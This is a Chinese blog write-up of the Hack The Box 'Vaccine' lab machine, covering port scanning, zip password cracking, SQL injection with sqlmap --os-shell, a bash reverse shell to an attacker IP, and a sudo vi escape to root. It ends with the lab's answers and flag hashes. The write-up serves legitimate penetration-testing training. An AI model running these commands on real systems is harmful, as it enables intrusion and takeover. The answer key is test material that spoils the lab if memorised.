Hack the box Vaccine题解
在打靶机的时候网络有点问题,所以这份WP里的目标机器的IP前后是不一样的,但总的来说,方法大同小异
扫端口
1 | nmap -sC -sV 10.129.252.99 |
开启了21、22和80端口,访问80端口,什么都没有,结合任务1和任务2,就直接练上去看有没有东西
ftp
连上以后把文件复制出来
破解zip密码
解压的时候发现是有密码的
看到任务4,和经过百度知道利用zip2john
去获取压缩包的hash
值,然后使用john
去破解hash
值
破解成功
backup的内容
得到了两个文件
其中index.php
里面有网站的管理员账号和密码,密码经过了md5加密,经过破解得到:qwerty789
,这也是任务5的答案
sql注入
登录到后台后有个搜索框尝试有无sql注入,发现可注入,加上任务6的提示,那就直接sqlmap
一把梭
用burpsuite
抓包保存到1.txt后,利用sqlmap进行注入,并利用--os-shell
进行执行shell
的命令
- 注入命令:
1 | sqlmap -r 1.txt --os-shell |
反弹shell
- 攻击机监听
1 | nc -lvvp 1234 |
- 在
--os-shell
里执行
1 | bash -c "bash -i >& /dev/tcp/10.10.14.13/1234 0>&1" |
在网站的根目录下的dashboard.php
里发现了数据库的一个账号的密码
1 | 账号:postgres |
提权
在前面的端口扫描里看到这台机器是开启了22端口的,尝试使用上面得到的账号密码去登陆(想要用这个是因为为反弹shell后并不稳定,老是掉线,所以就换另一个方法),可以成功登录
使用命令suo -l
查看postgres
能执行的高级权限的命令
发现有一个命令是:
1 | (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf |
然后看官方的wp得知,可以利用vi进行提权
首先运行命令:sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
输入:
切换命令模式输入:set shell=/bin/sh在按一次
:
切换到命令模式输入:shell
然后就切换到了root
用户
答案
- FTP
- anonymous
- backup.zip
- zip2john
- qwerty789
- –os-shell
- vi
- ec9b13ca4d6229cd5cc1e09980965bf7
- dd6e058e814260bc70e9bbdef2715849
参考博客
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Crzliang!
评论